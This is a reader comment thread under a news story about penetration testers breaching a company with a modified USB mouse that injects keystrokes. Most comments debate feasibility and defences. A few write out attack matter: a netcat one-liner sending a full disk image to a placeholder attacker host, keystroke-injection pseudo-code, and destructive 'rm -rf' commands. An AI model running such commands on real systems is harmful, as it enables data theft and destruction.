back to article Hackers pierce network with jerry-rigged mouse

When hackers from penetration testing firm Netragard were hired to pierce the firewall of a customer, they knew they had their work cut out. The client specifically ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits. …

COMMENTS

This topic is closed for new posts.
  1. Anonymous Coward
    Devil

    CIA computer special!

    Now on sale (cheap!) in Afghanistan, Iraq, Somalia, Yemen, etc....

  2. ~mico
    Pint

    Epic

    Just epic. Cheers to the h4x0rz.

    P.S. I wonder how many chinese peripherals...

    1. Anonymous Coward
      Thumb Up

      You need not wonder

      It is not just USB peripherals. Another standard one is plug which goes instead of the keyboard connector into the KBD socket on a laptop motherboard and does MIM to the kbd signals at the lowest (scan) level. While it is more convoluted, having a set of Apple, Dell, Lenovo and HP is usually sufficient to make sure you have everything you need at a conference. Most transmit/receive data so the guy from a well known competitor in one particularly well known country a couple of rows behind you is quite likely to be getting a full dump of everything you are typing stored on his laptop.

      So - never leave a laptop unattended and carry a prehistoric beast which nobody has any "ready baked" backdoors for. An Apple Mac G4 or some more esoteric chipset intel/AMD laptop (early HP NC40x0 series) can do the job quite nicely. The more esoteric - the better. That's why I keep my G4 and NC4000 and always use them on the road. From a security perspective both of them are becoming priceless.

      1. Marvin the Martian
        Holmes

        @esoteric chipset.

        Security through obscurity? Brilliant, who'd have thought of that.

        1. Anonymous Coward
          Thumb Up

          Nothing wrong with it

          There is nothing wrong with it if it is not the only thing you rely on.

          First of all, adding a bit of "security through obscurity" to a properly set-up defense in depth has never hurt anyone.

          Second, the guys who plug the MIM dongles onto the keyboard cable do not have that much time to do that. It is enough to hinder them sufficiently to get the job done. From that perspective, a blob of epoxy on the keyboard retention bolt of a "conference" laptop can go a very long way. Ditto for a bit of superglue (or even better - epoxy) in the correct places on the laptop keyboard, pad, etc ribbon cables couples with marking the keyboard. And so on. I know quite a few companies that do the epoxy routine on any equipment taken by their employees to that particular country (and they dispose of them upon return anyway too).

      2. Anonymous Coward
        Anonymous Coward

        G4?

        Isn't that was vulnerable to the firewire dma attack ready baked into an alternative iPod firmware?

      3. Fred Flintstone Gold badge

        You're wasting time

        Security through obscurity is just as useless as engaging in the standard technology war.

        It's more interesting if you can detect an event and then pollute the dataset it transmits - from what I've seen so far, most of the sophistication tends to lie in the trojans, not in the back end (that's also why they get hacked so quickly, which I find amusingly ironic.

        Pollution isn't just fun, it also devalues the data and so damages the financial basis on which these people operate - you cause a strategic hit on root causes instead of fighting a tactical battle with symptoms.

        Strategic approaches are much more entertaining and effective.

        1. nyelvmark
          Happy

          Security through obscurity

          If you don't believe that Security through obscurity works, can I take it that all your passwords are "password"?

  3. oldredlion
    Thumb Up

    blimey

    That's a pretty cool plan.

    From the story-telling angle it's a shame it depends on the staff member though. As with all these "new device" attacks it could be stopped by locking or closing all the external ports, which hardly ever seems to happen.

    1. ZweiBlumen

      PCs to resemble black boxes

      "As with all these "new device" attacks it could be stopped by locking or closing all the external ports, which hardly ever seems to happen."

      Not yet, no, but will do soon. In fact it surprises me that larger corporations still let users plug anything into their PCs at all.

      1. Anton Ivanov
        Devil

        They cannot do anything about it

        The device used in this attack reported itself as a standard Logitech mouse. This is what I get for an HP Mouse on my machine:

        root@whitestar:~# lsusb | grep -i mouse

        Bus 002 Device 003: ID 046d:c001 Logitech, Inc. N48/M-BB48 [FirstMouse Plus]

        Surprise, surprise, it is actually Logitech.

        So they actually chose the right device to emulate. It would have probably gotten past a reasonably tight group policy on Windows or a udev filter on Linux.

        In fact, anything short of strict matching of keyboard, mouse, etc serial numbers to a machine would have failed to stop this attack. Both Windows and Linux possess the means to implement such matching. I really would not want to be on the helldesk in a shop which uses it though. It is a nightmare to maintain and a nightmare to set up too because not all USB device drivers return serial numbers. In fact HID does not at least on Linux (probably same on Windows).

        That is exactly why large corporations cannot implement it. The larger the shop, the more dependent on helldesk throughput. Add to that the fact that most shops have implemented the whole ITIL shebang for anything going through the helldesk even if it is as small as changing a mouse. As a result, bolting the policy down to serial numbers will create a tsunami of change control schmutz which will wash away both the helldesk and whoever had the smart idea in the first place.

        1. David Hicks

          Some detection possible?

          In order to emulate a keyboard *and* a mouse, one would have thought that you'd need a USB hub chip in there too, at which point you have a policy that could deny the use of hubs, probably.

          I may be wrong of course, there could be a way to have mouse hardware + teensy pretend to be a logitech composite input device. But either way, to be able to send keypresses I have a feeling the system needs to recognise it as slightly more than a mouse.

          1. Michael H.F. Wilkinson Silver badge

            Re: Some detection possible?

            Various presenters input both mouse-like and keyboard-like commands, and you would not want to prohibit them. In the end, if someone really really wants to break in, it is almost impossible to keep them out.

          2. Anonymous Coward
            Devil

            USB Mouse is HID

            A generic HID device governed by the generic OS HID driver can send pretty much anything it likes without a hub chip. All modern mice are HID so there is very little to prevent them from sending non-mouse specific data. Ditto for keyboards behaving as mouse and so on.

          3. Jonathan Richards 1 Silver badge

            Hub

            Yes. If you read the blog post you will see that this is exactly what they did; scarfed a microcontroller and a USB hub into the inside of a mouse.

          4. T.a.f.T.

            Internal HUBS

            Unfortunatly a lot of PC's now days have USB hubs built inside of them, that is how you often get ports on the front and back of a machine or get multiple ports. One controller, then a hub into which you can plug devices. You could probably setup each machine type to reject any new hub though...

  4. Anonymous Coward
    Unhappy

    Nice...

    Amazing story, but now the Net has become yet an even scarier place!

    I hope they were well rewarded for their success for this assignment, but it opens up another box of nastiness.

    Fortunately it isn't yet possible to download such a mouse through a drive-by attack..

    (though a real drive-by attack throwing these mice at people might have some success!)

  5. Anonymous Coward
    Trollface

    ya ya...

    but will it work on a linux machine that is updated regularly?

    1. Anonymous Coward
      Trollface

      rtfa.

      Yes.

      Back at you.

      1. Annihilator
        Boffin

        re: rtfa

        "Yes."

        Well, limited. If the user that plugged in the device was running as root, then yes it could do the same damage. But to execute the rogue software, the device would still need to be able to run privileged code.

        1. JohnG

          RTFA again

          "...the device would still need to be able to run privileged code"

          All the clever stuff is run on the device itself - on the target system, it only needs to use standard applications to which the user would normally have access - but it would need to "know" the OS and what applications are available.

          The objective here is not to modify the system in any way, it is to steal information from the user and his/her organisation. All that is needed is to use a standard application to upload interesting files to some site on the Internet - maybe using a minimised browser window to upload files to a hacker's account on Google Docs (using ssl), for example.

        2. Velv
          FAIL

          bofh

          And it's not as if your average bofh doesn't receive a free mouse once in a while.

          Plug it in to your Linux desktop and let it work normally.

          Then just wait.

          Very soon, your bofh will su as root to perform some admin task

          BOOM!

          There are only degrees of safety, and anyone who relies on their own smugness will suffer, probably sooner rather than later

          1. Nigel 11
            Thumb Down

            No BOOM!

            Something pretending to be a USB mouse won't be able to intercept the keystrokes on the keyboard that your BOFH is using to su root. So it won't know when to launch its attack code.

            Of course, a similar attack with a "promotional" Logitech keyboard is trivial.

            Perhaps all BOFH's should restrict themselves to remote system administration in fuure, ie never su on the local keyboard, and instead from their administrator ultra-secure PC do

            # ssh root@targetpc

            where targetpc has appropriate firewall rules and sshd_config entries to make this possible only from the authentic BOFH mission control console. Then we're OK provided the BOFH knows better than to use promotional items for mission control....

            Until the attacker bribes a cleaner to put a hardware keylogger in the rats-nest behind the BOFH's mission control station, that is.

    2. Charles Manning

      Depends

      It won't work if the injected code was Windows code.

      To do the same on Linux would need some Linux specific code or something POSIXy (sudo rm -rf / or similar) and the user would need to type in root passwords etc.

      1. Wize

        @Depends

        It always depends. One set to take down a Linux box won't do a PC and vice versa (unless its set up for both).

    3. Anton Ivanov
      Devil

      Most likely easier than on Windows

      Linux has a unified HID driver which is same for Keyboard, Mouse, UPS and anything short of washing dishes.

      I have not read the code of that particular driver, but I would not expect it to filter keyboard events coming from a mouse or vice versa.

      On top of that Linux does not query serial numbers in HID so you are least likely to be able to bolt down your computer to work only with "your" mouse and "your" keyboard.

    4. copsewood
      Linux

      Could detect the environment

      Presumably it's a question of the code embedded and it seems highly probable that this could be programmed to detect the OS and other aspects of the system on which it is run and tailor the attack appropriately. The user not being root doesn't seem a big problem either if it contains a zero day privilege escalation attack, or can run its intended malicious payload within the user login context. After all, the target is more likely to be the network than compromising just one machine on the network.

  6. Anonymous Coward
    Coat

    "Especially promising"

    My guess is either CEO, CTO, or the head of IT.

    Mine with the cattle prod in the koshirae slung at the back for iaijutsu purposes.

    1. Anonymous Coward
      Anonymous Coward

      Target the top

      At my last contract, the guy at the very top of this international NGO demanded that policies were altered for his email and network accounts such that he could "use the same 4 letter password that he always uses". After a very short but valiant fight, the IT manager complied, for fear of damage to his career.

      1. mark 63 Silver badge
        FAIL

        his funeral

        i really , really , hope that comes back to slap him in the face

        ( the top guy obviously, not the IT guy )

      2. Colin Miller
        Unhappy

        Abigail Oath

        Most of us have probably heard of this, but

        Quoth Mike Sphar on 1999/10/05 in the Scary Devil Monastery,

        (Is it really 12 years old? The more things change, the more they stay the same)

        I think that we should officially make this the sysadmins credo. We'll

        call it "The Abigail Oath" and require all new sysadmins to swear it.

        Well, without the layoff part, maybe something like this:

        I am hired because I know what I am doing, not because I will do whatever I

        am told is a good idea. This might cost me bonuses, raises, promotions,

        and may even label me as "undesirable" by places I don't want to work at

        anyway, but I don't care. I will not compromise my own principles and

        judgement without putting up a fight. Of course, I won't always win, and I

        will sometimes be forced to do things I don't agree with, but if I am my

        objections will be known, and if I am shown to be right and problems later

        develop, I will shout "I told you so!" repeatedly, laugh hysterically, and

        do a small dance or jig as appropriate to my heritage.

        http://groups.google.com/group/alt.sysadmin.recovery/msg/1d05c6aa3681e609?output=gplain

  7. Paul Crawford Silver badge
    Terminator

    Sneaky, very sneaky!

    Must take my (red?) hat off to these guys, as they have upped the ante by a big amount. The same trick could be used with *any* USB device given a bit of engineering effort to have a hub & rogering-mouse included.

    Mouse/keyboard (obviously!)

    USB pen-drive/external drive.

    Phone with USB "charger".

    Printer with USB connection.

    You get the idea...

    I wonder how national security folk around the world are now eyeing the equipment they got from USA-based companies, made in China, handled by unknown agents, with suspicion?

    1. Adam Foxton

      Depending on the size of the microcontroller

      How about just a USB extension/phone charger/etc cable? The plastic on the back of them's big enough to hold a flash drive- and you get whole Bluetooth adaptors that aren't much bigger than just the USB connector itself.

      The Teensy board is surprisingly large for something called a 'teensy' (over an inch!), so you'd need to just wire directly to the microcontroller chip itself. But that looks far from impossible on that board and mechanical strength could be maintained by potting the back bit.

      So... basically, you shouldn't even allow staff to bring in CABLES from home, much less devices, if you're paranoid about security. Or if they do bring in cables, stick a megger across the data lines to fry anything connected to them...

      1. Matt Bryant Silver badge
        Pirate

        RE: Depending on the size of the microcontroller

        Sheesh, too much soldering, thanks. Just use a wifi-capable phone. Much more computing power, and it can be given as a gift (how many IT bods would turn down an iPhone4 or an HTC Desire S as a gift?) but with only the USB charging cable in the box rather than a wall-charger. Guaranteed, if it doesn't get you onto their wifi network, at some point some plank will plug it into a "secure" desktop/laptop in order to charge it. With the storage space on most modern smartphones you can run multiple hacking toolsets to cover all flavours of OS and still have plenty of space for downloading data that can later be beamed out via a surreptitious 3G call or an email. For a small(ish) fee I'll even let you in on the measures we take to guard against hax-by-phone.

        1. Zippy the Pinhead

          @ Matt

          You could block the cell phone installation by requiring signed drivers. My guess is the device wouldn't properly install. The user would then call IT.. they'd wipe the PC assuming its an issue with Windows, and then when the signed drivers still don't install the device properly IT would say it's the device that is defective and tell the user to take it up with the company that provided it... or turn off requiring signed drivers on that PC. Then you're screwed! lol

        2. Displacement Activity

          Too obvious...

          "Much more computing power, and it can be given as a gift (how many IT bods would turn down an iPhone4 or an HTC Desire S as a gift?) "

          Get to a trade show, get business cards in return for entry to a competition, make sure your targets win the phone. I can feel a new career coming on.

          Wouldn't have helped in this case, though, since phones weren't allowed.

  8. chrizzle23

    Congrats to Irongeek

    I saw Adrian's prototype of the PHUKD at Notacon a couple of years ago. His website is a great resource. I'm glad his work is getting media attention.

  9. Eddie Johnson
    Mushroom

    Legacy Free == Insecurable

    This just proves a theory off mine, the so called "legacy free" computers with no PS2 style mouse and keyboard connectors are a dumb idea. Not to say this exploit couldn't have happened over a PS2 connection (given the microcontroller aspect) but its certainly a lot easier via USB. I've steered away from a number of recent motherboards for their lack of PS2 ports.

    2 basic security rules would have prevented this attack, always be suspicious of "free" gifts and never allow users access to USB ports. This reminds me of the viruses spread by free thumb drives given away at trade shows.

    1. Anonymous Coward
      Coffee/keyboard

      If it was a PS2 version

      wouldn't you need some way of transferring the data over PS2? I don't think I've ever seen a PS2 flash drive so you'd be looking at a more advanced version.

      I guess you could do a slightly different version to take advantage of that- but this time your device would be a keyboard. Log all traffic and get the user's password that way (just pick up whatever's typed after ctrl-alt-del and before the long wait for the desktop to load, I guess).

      Then wait for no keyboard activity for 5 minutes (in a corporate environment, that's probably a sign of it being on a password-protected screen saver). You can then 'type' in the user's password and gain access to their system. Just run a simple set of commands that downloads an innocuous file to the user's PC (as, say, a .pdf), navigate to it and then run it. You can then have that client software 'phone home' and get whatever malware you want from some server or other.

      It can be defeated with 2-factor identification (say, smartcards), a longer screensaver time or your target using his laptop keyboard rather than the external one, but you'd presumably have clocked if they were using smartcards during the meeting where they hired you to perform penetration tests and the rest's just luck...

      Alternatively, go to the toilet after the meeting and drop a USB flash drive behind the toilet. Label it "if found, please return to [smudge]. Someone'll find it and plug it in to see who it belonged to.

    2. BristolBachelor Gold badge

      Different approach on PS2

      I've got into PS2 systems before by plugging in a device that enters "copy con: filename" then you transfer the code you want. Really it needs to be something very small and simple like a bootloader; mine then transfered the rest by RS232 because it was much easier to program a small micro to talk a standard bootloader over PS2, and transfer the real payload by RS232 from a small laptop (in this case a Zenit datasystems 8086 with built-in CGA mono screen!)

      This was in the headays of PS2, when most computers still had the old style DIN connectors, maybe about '94.

      The rule of lore is if you can touch it, you can (normally) own it. The VAXs however were harder...

      1. Anonymous Coward
        Anonymous Coward

        The good old days

        "The VAXs however were harder..."

        I seem to remember the concept of placing something in the serial connection between a user terminal and the terminal server. The device would intercept both user input and system replies. The additional feature was to use the "copy to attached printer" function to transfer files to the interception device.

      2. Frumious Bandersnatch
        Coffee/keyboard

        copy con com1

        Hmmm... that brings me back to the days of using an RS232 cable to transfer files between (PC) computers. Back before network cards (ether or token ring) were commonplace. I can't remember the name of the program that was used but it used a very similar method to what's described in the article. The sending side would run the transfer software and on the receiving side you'd start by typing in "copy com1 con" which basically copies input (ascii) from the serial port to the keyboard. The sending side would then "type" in a small bootstrap program which would be saved on the target computer. That bootstrap program would then copy over the rest of the program so you could get a nicer interface to show files in progress, transfer checksums so that you could detect transmission errors and the like.

        The best part of the scheme was that you'd end up with a working copy of the transfer program on the target computer, so you could start the transfer from that machine to another machine later. Looking back, I suppose it's kind of funny that we were all using a kind of worm program for a useful purpose. I'd love to remember what it was called. Might have been something generic like "PC Link"?

        Of course, this custom mouse does away with the need for the user to type "copy com1 con" on the receiving side, since it already is the keyboard.

        1. Templar
          Happy

          'pc link'

          We used laplink and had to make our own laplink cables, being poor students and all.

          Playing Doom2 multiplayer by serial cable, you had to be drunk to enjoy it.

          1. Frumious Bandersnatch

            laplink!

            that's what that program was called... thanks :-) FWIW, I also had to make my own null modem cable. Good times.

            1. This post has been deleted by its author

  10. . 3

    Nice hack

    Neatly demonstrates the USB renegotiation function built into the newish Atmel ATMega*u2/4/6 line.

    It's not really doing anything you couldn't do with an attack on a wireless keyboard though and stands a higher risk of being detected. e.g. by the anti-virus software throwing a warning when a new device is connected. I have been on sites where the leads are glued into the USB ports and any spares pasted over to mitigate this type of attack.

  11. Tom Chiverton 1 Silver badge
    Linux

    Phut

    Amazon managed to preempt these attack at their Web Services summit, http://rachaelandtom.info/content/using-your-amazon-web-services-summit-2011-card-under-linux-or-macos-awssummit2011 which leads neatly to https://bugs.launchpad.net/ubuntu/+source/linux/+bug/798858

  12. Anon999
    WTF?

    They did not mention defence.

    Curious that they did not mention how to defend against this.

    Simply use Applocker and deny execution from all external media.

    1. Anonymous Coward
      Devil

      Wont work...

      Its not running code on the system as such, so no this wouldnt work. Its basically sending keypresses as I read this, so the code is something like:

      <wait for 60 seconds on idle time after being plugged in for [n] minutes>

      <send keypress ctrl-esc>

      <send keypress up arrow>

      <send keypresses "cmd">

      <send keypresses "[some command string]" to dos window>

      <etc.>

      So its relying on applications already on the machine to do its dirty work

      (Well obviously trying to be quick to stop windows popping up etc., but if you time it right on delays before activating you should be good and avoid screenlocks etc. I'm sure there is also a way in the USB negotiation to work out what OS you are running on to, so you can send the right keypresses for Win vs. Linux vs. Mac)

      1. Peter2 Silver badge

        I'd be interested to see how this did against my software restriction policy...

        Which basically says the default level is "disallowed" and C:/program files is "allowed". (disabled for local admins, obviously. We need to be able to install stuff)

        If that is how it works, then the machine would just display an SRP error when you tried to execute the external code and the attack would fail.

        I think. Probably. In theory.

        I don't suppose you can get a copy of this attack code from anywhere?

        1. Anonymous Coward
          Joke

          There's one in the post to you

          Not saying in what form it'll reach you though.

      2. Michael Heydon

        Yes, it will

        "...programmed to wait 60 seconds after being plugged in to a computer and then enter commands into its keyboard that executed malware stored on the custom-built flash drive snuck into the guts of the Logitech mouse."

        That's not to say that a different attack might only send key strokes, but this one used an external drive that is easily blocked.

  13. xj25vm

    Same attack on Linux

    Do I take it if such an attack would be targeted at Linux (or other *nix) - that although the mouse would indeed be recognised as a mouse (or keyboard) by the kernel and subsequently allowed to pass commands to the current screen or terminal - it would really be limited to the privileges of the currently logged user? Thus, if this attack would be run against a reasonably secured box - without additional sophisticated privilege escalation techniques - I assume it would have really limited impact, due to the limited privileges normally assigned to a regular user?

    1. Tom Chiverton 1 Silver badge
      Thumb Down

      Well...

      Well, unless I'd sudo'ed already. Or have a terminal open to another box. Or ...

      It's crazy.

      And some people are using it for marketing.

    2. Anonymous Coward
      Coat

      Just don't count on that!

      It's easy to code a loop waiting for "su" or "sudo" at the beginning of a character string.

      No OS is safe against this because it's a hardware-level attack. The same thing happens if somebody would embed malicious code into the firmware of your hard-disk or network card.

      Oh, and for the same reason, two factor authentication will not work either.

      The solution to this would be a DRM-like scheme where the CPU will not trust any piece of hardware, unless cryptographic signature are verified and found to be correct. Would you like that kind of PC ?

      1. Paul Crawford Silver badge

        @Just don't count on that

        As a 'mouse' or other USB device it would not know what was typed on another keyboard-like input device, so not that simple..

        But if you did the same modification to a keyboard, then yes it is quite simple...

      2. Charles Manning

        Not that easy...

        "It's easy to code a loop waiting for "su" or "sudo" at the beginning of a character string." But how do you get that code to run and how do you get that info out to the USB device?

        The only way to do that would be by attacking the keyboard where the data is available.

        "No OS is safe against this because it's a hardware-level attack." It is not a hardware level attack, but an OS level one. If you were using a software environment that only ran a specific application with no ability to start a new shell etc, then this would not work.

        1. Wize

          @Not that easy...

          Ok, build it into the keyboard. Then you know its typed.

          Or run a program at the current execution level that pretends to be your desktop (thus getting all keystrokes and mouse movement) and display some sort of error that you'd want to raise your login level to fix...

    3. Paul Crawford Silver badge

      @Same attack on Linux

      Yes and no.

      The basic idea is the same, if you can move the mouse and/or type key strokes you can do a LOT.

      It is also likely (e.g on Ubuntu) that you could have a USB drive auto-mounted with a known name (based on the volume ID/name) so loading arbitrary software is also possible.

      Now unless you were lucky and able to type in a terminal opened for root (or recently sudo-ed) and the user is privileged and not terribly observant, escalating is not as likely, but still possible depending on the user and/or exploits you can muster.

      But if all you wanted to do was slurp the contents of the user's home directory and/or reveal network details that could help another attack, which could have a wealth of sensitive information, then it is easy! Without attempting to hide your operations, just open command dialogue with Alt+F2, then enter a command such scp or rsync with details of a dodgy destination server...

  14. Anonymous Coward
    Anonymous Coward

    Hackers pierce network with jerry-rigged mouse

    "the technique can work against a variety of operating systems, not just Windows."

    More details, or it's just FUD.

    1. Tom Chiverton 1 Silver badge

      Details ?

      You want details ? Go read my Launchpad bug linked above.

    2. Richard 12 Silver badge
      Boffin

      The USB device pretends to be the user typing on a keyboard

      So it can do anything the user can, as long as it doesn't need to know anything the user knows.

      In other words, it can do anything the user might be able to do without a password. If you already know the target operating system (or have a list of target operating systems), then it can issue suitable keyboard commands to upload interesting information, or download a program to do interesting things.

      Ok, your device only has user privileges, but for a lot of attacks that may be enough.

      Which leads to the question - should you be worried?

      I'd say that unless you're doing something particularly secret and juicy, I doubt it as the attack is pretty expensive - and if the mark tosses the freebie into the bin, notices something odd and pops the lid, or even simply uses it on a system that doesn't contain the stuff you're trying to get, then it fails.

      Cool idea though - hats off to PJRC and/or Atmel for the very-subtle marketing ploy.

      1. Peter Murphy
        Thumb Down

        Well, I'd be worried even if I wasn't doing something...

        ... particularly secret or juicy.

        You don't need sudo privileges for rm -rf /home/current_user/* to do significant damage to your account.

  15. Anteaus
    Holmes

    A software restriction policy is useful protection.

    A software restriction policy might not prevent all malicious actions possible with this kind of exploit, but it would prevent malware being launched on the PC from the mouse's USB memory. Which I assume is the main component of the exploit, the mouse's controller being preprogrammed to simulate the clicks needed to do this.

    If the user is limited, the the mouse controller would also find it hard to circumvent the policy by copying the malware to the computer's HD, since locations which are writable to a limited user will typically not permit software launch.

    Policy-application tool:

    http://sf.net/projects/softwarepolicy

  16. Ralthor
    Joke

    Security...

    ... has always been a game of cat and mouse.

  17. Anonymous Coward
    Mushroom

    Clever - but not new

    An inline input device can trivially

    - Capture all keystrokes and log to it's hardware store for later retrieval

    - Be made to transmit all keypresses and mouse movements wirelessly

    - Switch from 'user input' mode to 'remote input' mode, to over-ride input

    - Inject key sequences in a pre-defined sequence

    - Upload code to the target machine - this is the most complex of all (usually requires exploit code to avoid detection by o/s/AV) - refer to this article

    - Uploaded code can be used to do keylogging, screen grabs, remote access and upload captured data (hidden locally) via http to a remote site - all easy to do and simple avoid anti-virus

    Citations?

    Hell - if you don't believe me, try to prove me wrong and I'll cite you a 'how-to' for every single one!

  18. Jolyon Smith
    FAIL

    Um, neat idea but very limited in practice

    The device sends keyboard commands from a device that no-one would suspect is sending such commands - clever. But those commands are useless unless the software on the connected computer is PRECISELY what those keyboard commands are expecting - the device has no way of telling that the computer is not in fact running McAfee (and indeed, some very particular version of McAfee) but some other anti-virus or no anti-virus at all (not to mention the keystrokes required to launch some software from the device in the first place).

    The commands being sent to the computer could very well lead to some very odd behaviours if it isn't the expected OS and software on the computer, instantly revealing that something is afoot.

    Sure, usual strategies for identifying and removing the source of such odd behaviours are not going to work, but the net result will be the same - odd behaviours, not a compromised computer (unless and until the "perfect storm" of required OS and anti-virus software etc somehow contrives to later appear on the attached computer).

    Similarly, I struggle to believe that a universal set of commands can be made to work regardless of the OS on the connected PC.

    Yes, the technique can be made to work against a variety of OS's, but any one such device once made is going to be very firmly bound to just one OS.

    Which brings me to another problem with this technique as a practical threat...

    Yes, everyone picks up promotional USB drives at conferences and events and merrily plugs them into their computers without thinking. But a mouse? Really?

    How do we get this device into the hands of someone we wish to attack?

    "Here, take this mouse - oh wait. Can I just ask, what OS do you use? Oh Linux... OK, in that case, can you take this mouse instead...? Uh, and what anti-virus package do you use? OK, forget that mouse, this is the one... oh, um, what version of XYZ anti-virus is that...? ah.. hang on a minute... oh no, sorry, we don't have a mouse for that one."

    Setting aside motivation and whether something is A Good Idea™ in terms of it's goals, clever ideas need practical applications, otherwise they might just as well be dumb ideas.

    As far as I can see, this one has Dumb Idea written all over it.

    1. Paul Crawford Silver badge
      Thumb Down

      @Um, neat idea but very limited in practice

      This is a highly targeted attack needing money & skill. Not a mass market drive-by sort of web browser hack for mum & dad's ageing PC.

      I suspect anyone deploying this will have done their homework and got a good idea of what the victim is using. Most likely it will be the "corporate Windows image" for 99% of the workforce, so you can work from that point onwards...

    2. Anonymous Coward
      FAIL

      Can you read?

      FFS. Did you read the article?

      "To get someone from the target company to use the mouse, Netragard purchased a readily available list names and other data of its employees. After identifying a worker who looked especially promising, they shipped him the modified mouse, which they put back in its original packaging and added marketing materials so the shipment would look like it was part of a promotional event."

      "Three days later, the malware contained on the mouse connected to a server controlled by Netragard"

      Not an idea... they actually managed to do it!

    3. Anonymous Coward
      Anonymous Coward

      "How do we get this device into the hands of someone we wish to attack?"

      They've just done exactly that. It's a shame you think it's a "Dumb Idea", but since the customer hired Netragard, and not a commenter on The Register, I expect we can leave the expert assessment to them.

    4. Anonymous Coward
      Anonymous Coward

      Point missed?

      It doesn't need to install malware nor worry about A/V.

      It can install goodware with malintent.

      This changes the game as the dumb user becomes a genius hacker "avatar" by proxy.

      Anything you can do physically at the machine, it can do too thus:

      use a browser to get and install putty vnc winscp

      configure putty with a private key

      ssh into remote machine and create reverse tunnel for vnc

      configure winscp, login to attacker machine, send \*.* or whatever

      On linux, in a root terminal this will grab an entire hard drive until noticed:

      nice n19 dd if=/dev/sda bs=4096 | gzip | nc badguy port

      All it has to do is pick a time when machine is on and owner not there.

    5. Sandtitz Silver badge

      It *can* work

      As long as the internal logic on the device contains enough memory and instructions the enhanced mouse can be used on any environment. The device could deduct from the user's input whether the system is Windows, Linux or something else. Waiting for typical commands such as ls, cat, vi and so on would lead the device to think we're in Linux land whereas cmd, dir, Win+R and other keystroke combinations would be a sign of Windows.

      The attack can never be idiot proof due to system configurations, reliance on system utilities that aren't there, disabled terminal access, firewall settings and so forth. But grabbing the user's own data and sending it with e.g. FTP would work in most settings, I'm sure.

    6. Jeff 11
      Stop

      @Jolyon Smith

      You're pretty naive. This was an idea that was implemented in a reasonably trivial piece of software, but it was trivial and it worked.

      A cleverer use of this exploit would be to buffer the keystrokes and run heuristic detection based on the commands entered. In reality there's Windows, and there's Unix, and there's also the way the USB driver stacks interact with the device. With enough logging, information and time for the inbuilt computer to get a pretty good idea of which environment it's being used, it can be used to download and execute a bootstrap mechanism which can then go on to do the real damage. It can even use its internal clock and a delay mechanism to wait until the dead of night and minimize the risk that the user can detect what's going on.

      Or if so inclined, a hacker could program the device to try several trial and error strategies, waiting for a software callback that would be initiated by successfully bootstrapping a piece of malware.

      The possibilities are numerous.

  19. Mage Silver badge
    Happy

    I have been saying for years...

    Beware the Geeks bearing gifts.

  20. Anonymous Coward
    Anonymous Coward

    USB = Universal Security Breach

    or Unlimited Security Breach

  21. Steve Evans

    Very clever...

    Very neat attack, although I must admit being told you couldn't use "social networks, telephones, and other social-engineering vectors" is kind of like testing a body armour and saying "Oh, but you can't shoot at the head, arms or legs", i.e. knowing there are already serious shortfalls in the protection in those areas.

    1. ThomH

      My guess...

      ... they probably had someone much cheaper doing the ordinary "social networks, telephones and other social-engineering vectors" testing, or already had them done. Or the point was to prove to somebody that those aren't the exclusive points of attack rather than that the system is safe.

  22. Anonymous Coward
    Anonymous Coward

    Whats this a story about Hackers that contains hackers - been a while

    Nice, this is how I define hacking and not the ability to launch a DDOS.

    Highlights the need for a SecureUSB standard were the admin approves hardware devices.

    1. Gorbachov
      Thumb Down

      probably useless

      It would probably be difficult to implement for little gain. Although it could be done, I guess, in software with something like UUIDs. But then you would need to think about protecting from UUID spoofing. And it would be a total PITA to constantly manage hardware replacements.

      It's easier to deny access to USB/PS2 ports completely and then you're safe(er).

  23. Anonymous Coward
    FAIL

    Fail

    "The client specifically ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits."

    FAIL - they used both social engineering and physical access.

    1. frito_x
      Stop

      Seems like noone noticed...

      this is the first in a lot of comments that have actually pointed this out while everyone else is congratulating the hackers... reading comprehension much?

    2. Paul Crawford Silver badge
      Thumb Down

      @Fail

      (1) It depends on how you define "social engineering", as in this case they did not manipulate the target beyond posting the device to a selected individual.

      (2) They did not have local physical access. They did not break in to the building or its infrastructure. This was a real Trojan horse, or more precisely, a Trojan mouse.

      So I would say they did the job, and I would also say that asking for your defences to be tested while ruling out some of the known attack vectors is a bit dumb of the hiring company.

      "Look at the size of my door lock! Bet you cant pick it!"

      "Where are your window locks?"

  24. DragonKin37
    Thumb Up

    My hats off to them

    This is what pen testing is all about nice work to those guys. The scary thing other countires like China & Russia do this all day every day to the US and their own ppl. Small buisnesess that work or collaborate with goverment contractors are just a stepping stone to the big fish they want to sink their programming hooks in...

  25. JC 2
    Stop

    Shouldn't normally work

    They had to know which antivirus to suppress, AND they needed that antivirus to not scan removable media nor intervene with a sandbox until the user intervenes and changes the default, which normally there is no command line to be rid of so the device would have to emulate a mouse, run a program to find the popup which it can't, so it's game over.

    It could try to connect remotely but a firewall "might" stop that. I'm not suggesting it couldn't work but you would need to know more about your target than (nothing really, social engineering of some sort is needed even if it is not a social networking site or phone calls).

    Also, as a matter of routine removable storage is disabled on critical systems and those networked to them. There would be no volume mounted to execute the payload from.

    1. amanfromearth
      FAIL

      read..

      You need to read the article again.

  26. Anonymous Coward
    FAIL

    so - this is a complete FAIL

    "ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits"

    FAIL as social engineering was used.

    Eloquent hack, but invalid.

  27. Anonymous Coward
    Happy

    HAHAHAHAHAHAHAHAHAHAHA

    HAHAHAHAHAHAHA and then again AHAHAHAHAHAHAHAHAHAHAHAHA...brilliant.

  28. M Gale

    Arduino is an Italian masculine first name, meaning...

    ..."pwned".

  29. Steve Evans

    Okay...

    Hands up who's just taken their mouse apart to check?

    My excuse was it needed a clean ;-)

  30. Boo Radley

    Beware the "Free Lunch"

    So they sent the doctored mouse to an employee as a "sales promotion."

    Oh look at the great free mouse someone sent me! Think I'll take it to the office and try it out!

    See, nothing in life is truly "Free" LOL

  31. Head
    Thumb Up

    Hmmm

    I am reminded of that TV show, Danger Mouse...

  32. Steven Roper

    60% of people plug thumbdrives they find outside into computers?

    Ugh. I would not plug any item I found in a car park into my computer any more than I would eat a stepped-on pie or sandwich I saw lying on the pavement. Yuck!

